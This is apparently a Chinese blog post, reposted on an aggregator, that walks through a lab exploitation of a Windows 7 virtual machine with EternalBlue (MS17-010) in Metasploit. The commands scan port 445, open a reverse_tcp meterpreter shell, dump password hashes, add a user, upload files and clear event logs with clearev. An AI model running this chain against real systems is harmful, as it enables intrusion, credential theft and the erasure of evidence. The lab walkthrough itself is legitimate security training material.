利用EternalBlue控制win7虚拟机

2023-12-03 18:38

本文主要是介绍利用EternalBlue控制win7虚拟机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

利用EternalBlue控制win7虚拟机

WannaCry

https://www.sogou.com/link?url=DOb0bgH2eKjRiy6S-EyBciCDFRTZxEJgIH83_ioKlBAYUPdjyPzg-xvT47fi1v8bLv_Z_c0A1BdCJFQqz9HOu_13O0P_SOdx7XzrA381xFT2UTfnzsf64g…

http://blogs.360.cn/post/eternalblue_to_ransomware.html

EternalBlue

http://blogs.360.cn/post/nsa-eternalblue-smb.html

445端口

https://baike.baidu.com/item/445%E7%AB%AF%E5%8F%A3/3519185?fr=aladdin

使用工具

Metasploit

快速入门:

https://www.baidu.com/link?url=p62q40-hOOuX4nKi9g9LLqv_OYcrG392HMxX_P2wYhZXvnEMfjc8sgXC6yJ8F8bz&wd=&eqid=cd9a049f002c287d000000045db58842

用法大全:

https://blog.csdn.net/yanlongge/article/details/89490822

环境配置

靶机:Windows 7 x64虚拟机,IP地址为192.168.145.141
本机:Kali Linux,IP地址为192.168.145.134

控制过程

  • 查询两台虚拟机的IP地址
    在这里插入图片描述
  • 确认win 7靶机是否开放445端口

nmap -sV 192.168.145.141

在这里插入图片描述

  • 进入metaploit,利用msf的auxiliaty验证漏洞

msfconsole
search ms17-010

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 验证漏洞是否可利用

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.145.141
set rport 445
run

在这里插入图片描述

  • 设置好靶机地址、攻击端口和本机地址

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.145.141
set rport 445
set lhost 192168.145.134

在这里插入图片描述

  • 使用payload攻击

set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

  • 枪已上膛,最后检查一下配置

show options

在这里插入图片描述
在这里插入图片描述

  • 冲啊!!!

run

在这里插入图片描述

  • PWN!!!返回控制通道
    在这里插入图片描述

搞破坏

  • 获取用户Hash值

hashdump

在这里插入图片描述

  • 获取system权限

sysinfo

在这里插入图片描述

  • 创建新用户

net user [用户名] /add

在这里插入图片描述
去win 7验证一下:
在这里插入图片描述

  • 上传文件

upload [文件] [靶机路径]

在这里插入图片描述
去win 7验证一下:
在这里插入图片描述
在这里插入图片描述

  • 清除事件日志

clearev

在这里插入图片描述

这篇关于利用EternalBlue控制win7虚拟机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/450446

相关文章

Python实现局域网远程控制电脑

《Python实现局域网远程控制电脑》这篇文章主要为大家详细介绍了如何利用Python编写一个工具,可以实现远程控制局域网电脑关机,重启,注销等功能,感兴趣的小伙伴可以参考一下... 目录1.简介2. 运行效果3. 1.0版本相关源码服务端server.py客户端client.py4. 2.0版本相关源码1

Spring Security 基于表达式的权限控制

前言 spring security 3.0已经可以使用spring el表达式来控制授权,允许在表达式中使用复杂的布尔逻辑来控制访问的权限。 常见的表达式 Spring Security可用表达式对象的基类是SecurityExpressionRoot。 表达式描述hasRole([role])用户拥有制定的角色时返回true (Spring security默认会带有ROLE_前缀),去

控制反转 的种类

之前对控制反转的定义和解释都不是很清晰。最近翻书发现在《Pro Spring 5》(免费电子版在文章最后)有一段非常不错的解释。记录一下,有道翻译贴出来方便查看。如有请直接跳过中文,看后面的原文。 控制反转的类型 控制反转的类型您可能想知道为什么有两种类型的IoC,以及为什么这些类型被进一步划分为不同的实现。这个问题似乎没有明确的答案;当然,不同的类型提供了一定程度的灵活性,但

HotSpot虚拟机的经典垃圾收集器

读《深入理解Java虚拟机》第三版笔记。 关系 Serial、ParNew、Parallel Scavenge、Parallel Old、Serial Old(MSC)、Concurrent Mark Sweep (CMS)、Garbage First(G1)收集器。 如图: 1、Serial 和 Serial Old 收集器 2、ParNew 收集器 3、Parallel Sc

理解java虚拟机内存收集

学习《深入理解Java虚拟机》时个人的理解笔记 1、为什么要去了解垃圾收集和内存回收技术? 当需要排查各种内存溢出、内存泄漏问题时,当垃圾收集成为系统达到更高并发量的瓶颈时,我们就必须对这些“自动化”的技术实施必要的监控和调节。 2、“哲学三问”内存收集 what?when?how? 那些内存需要回收?什么时候回收?如何回收? 这是一个整体的问题,确定了什么状态的内存可以

深入解析秒杀业务中的核心问题 —— 从并发控制到事务管理

深入解析秒杀业务中的核心问题 —— 从并发控制到事务管理 秒杀系统是应对高并发、高压力下的典型业务场景,涉及到并发控制、库存管理、事务管理等多个关键技术点。本文将深入剖析秒杀商品业务中常见的几个核心问题,包括 AOP 事务管理、同步锁机制、乐观锁、CAS 操作,以及用户限购策略。通过这些技术的结合,确保秒杀系统在高并发场景下的稳定性和一致性。 1. AOP 代理对象与事务管理 在秒杀商品

PostgreSQL中的多版本并发控制(MVCC)深入解析

引言 PostgreSQL作为一款强大的开源关系数据库管理系统,以其高性能、高可靠性和丰富的功能特性而广受欢迎。在并发控制方面,PostgreSQL采用了多版本并发控制(MVCC)机制,该机制为数据库提供了高效的数据访问和更新能力,同时保证了数据的一致性和隔离性。本文将深入解析PostgreSQL中的MVCC功能,探讨其工作原理、使用场景,并通过具体SQL示例来展示其在实际应用中的表现。 一、

vue2实践:el-table实现由用户自己控制行数的动态表格

需求 项目中需要提供一个动态表单,如图: 当我点击添加时,便添加一行;点击右边的删除时,便删除这一行。 至少要有一行数据,但是没有上限。 思路 这种每一行的数据固定,但是不定行数的,很容易想到使用el-table来实现,它可以循环读取:data所绑定的数组,来生成行数据,不同的是: 1、table里面的每一个cell,需要放置一个input来支持用户编辑。 2、最后一列放置两个b

win7+ii7+tomcat7运行javaWeb开发的程序

转载请注明出处:陈科肇 1.前提准备: 操作系统:windows 7 旗舰版   x64 JDK:jdk1.7.0_79_x64(安装目录:D:\JAVA\jdk1.7.0_79_x64) tomcat:32-bit64-bit Windows Service Installer(安装目录:D:\0tomcat7SerV) tomcat-connectors:tomcat-connect

【电机控制】数字滤波算法(持续更新)

文章目录 前言1. 数字低通滤波 前言 各种数字滤波原理,离散化公式及代码。 1. 数字低通滤波 滤波器公式 一阶低通滤波器的输出 y [ n ] y[n] y[n] 可以通过以下公式计算得到: y [ n ] = α x [ n ] + ( 1 − α ) y [ n − 1 ] y[n] = \alpha x[n] + (1 - \alpha) y[n-1]